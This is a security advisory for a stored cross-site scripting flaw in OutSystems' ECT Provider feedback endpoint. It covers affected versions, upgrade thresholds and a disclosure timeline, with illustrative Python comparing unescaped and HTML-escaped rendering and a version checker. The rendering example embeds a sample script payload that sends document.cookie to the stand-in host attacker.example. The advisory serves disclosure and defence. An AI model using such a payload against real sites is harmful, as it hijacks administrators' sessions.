CVE-2020-13639 - OutSystems ECT Provider Unauthenticated Stored Cross-Site Scripting

1. Vulnerability Properties

Title: OutSystems ECT Provider Unauthenticated Stored Cross-Site Scripting
CVE ID: CVE-2020-13639
CVSSv3 Base Score: 5.4 (AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
Vendor: OutSystems
Products: OutSystems Platform
Advisory Release Date: 20 Aug 2021
Advisory URL: https://labs.integrity.pt/advisories/CVE-2020-13639
Credits: Discovery by Fábio Gomes <fg[at]integrity.pt>

2. Vulnerability Summary

OutSystems Platform is vulnerable to stored cross-site scripting (XSS) in the ECT Provider feedback endpoint (/ECT_Provider/). Feedback can be submitted without authentication, and a JavaScript payload placed in it persists with the feedback record. The payload is executed in the browser of an Administrator who later reviews the submitted feedback, so it runs with the Administrator's authenticated session rather than the anonymous submitter's.
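
The pattern behind this class of bug, as an added illustration that is not OutSystems code and does not reproduce the ECT Provider's real pages or field names: the feedback record below is constructed for the example, the first renderer concatenates stored input into the review page as-is, and the second applies HTML output encoding before the content reaches the Administrator's browser.

```python
import html
import re

# Constructed sample feedback record, as an unauthenticated user might submit it.
# The field names are illustrative; they are not the ECT Provider's real schema.
SAMPLE_FEEDBACK = {
    "page": "/Home.aspx",
    "comment": (
        "Save button does nothing"
        '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
    ),
}


def render_feedback_vulnerable(record: dict) -> str:
    """Build the Administrator's review row by concatenating stored input as-is.
    Whatever the submitter typed becomes live markup in the reviewer's browser."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(record["page"], record["comment"])


def render_feedback_fixed(record: dict) -> str:
    """Same row with contextual output encoding: each untrusted field is
    HTML-escaped before it is placed in element content. quote=True also
    escapes quotes, which matters if a field is ever reused in an attribute."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(record["page"], quote=True),
        html.escape(record["comment"], quote=True),
    )


# Crude marker used only to compare the two renderers: a live <script> start tag.
_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_active_script(rendered_html: str) -> bool:
    """True if the rendered HTML still contains an unescaped <script> tag."""
    return _SCRIPT_TAG.search(rendered_html) is not None


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_feedback_vulnerable),
                           ("fixed", render_feedback_fixed)):
        out = renderer(SAMPLE_FEEDBACK)
        print(f"{name}: active script = {contains_active_script(out)}")
        print("  ", out)
```

Encoding at the output point is the fix that matters; filtering `<script>` on input would miss event-handler attributes and other vectors, and a Content-Security-Policy on the administrative pages is a useful second layer but not a substitute.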

3. Vulnerable Versions

  • Outsystems 10 < 10.0.1005.2
  • Outsystems 11 Platform Server < 11.9.0
  • Outsystems 11 LifeTime Management Console < 11.7.0

4. Solution

  • Upgrade the affected product line to the following version or later:
    • Outsystems 10 >= 10.0.1005.2
    • Outsystems 11 Platform Server >= 11.9.0
    • Outsystems 11 LifeTime Management Console >= 11.7.0
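
A check against the thresholds in sections 3 and 4, added here as an example rather than anything shipped by OutSystems. The product labels used as dictionary keys are chosen for this example; the version strings are the advisory's. Segments are compared numerically, since comparing version strings as text would rank 10.0.999.9 above 10.0.1005.2 and report a vulnerable build as fixed.

```python
from typing import Dict, Tuple

# Fixed versions as stated in section 4 of this advisory. The dictionary keys
# are labels chosen for this example, not OutSystems product identifiers.
FIXED_VERSIONS: Dict[str, str] = {
    "platform-10": "10.0.1005.2",
    "platform-server-11": "11.9.0",
    "lifetime-11": "11.7.0",
}


def parse_version(text: str) -> Tuple[int, ...]:
    """'11.9.0' -> (11, 9, 0). Non-numeric segments raise rather than
    silently comparing as 'not vulnerable'."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"malformed version string: {text!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(product: str, installed: str) -> bool:
    """True when `installed` is below the fixed version for `product`.

    Segments are compared numerically, so 10.0.999.9 is correctly treated as
    older than 10.0.1005.2 even though "999" sorts after "1005" as text.
    Shorter versions are padded with zeros so 11.9 == 11.9.0.
    """
    fixed = parse_version(FIXED_VERSIONS[product])
    current = parse_version(installed)
    if current[0] != fixed[0]:
        # Each product line has its own threshold; comparing an 11.x build
        # against the 10.x threshold (or vice versa) would give a wrong answer.
        raise ValueError(f"{installed} is not a {product} version")
    width = max(len(fixed), len(current))
    fixed += (0,) * (width - len(fixed))
    current += (0,) * (width - len(current))
    return current < fixed


if __name__ == "__main__":
    for product, version in (("platform-10", "10.0.999.9"),
                             ("platform-server-11", "11.9.0"),
                             ("lifetime-11", "11.6.12")):
        state = "vulnerable" if is_vulnerable(product, version) else "fixed"
        print(product, version, state)
```

Note that Platform Server and LifeTime are versioned independently on the 11 line, so both have to be checked against their own threshold.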

5. Vulnerability Timeline

  • 20/Feb/2020 - Vulnerability reported to OutSystems
  • 27/Feb/2020 - Vulnerability verified by vendor
  • 4/Sep/2020 - Vulnerability fixed by vendor
  • 20/Aug/2021 - Advisory released

6. References

  • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13639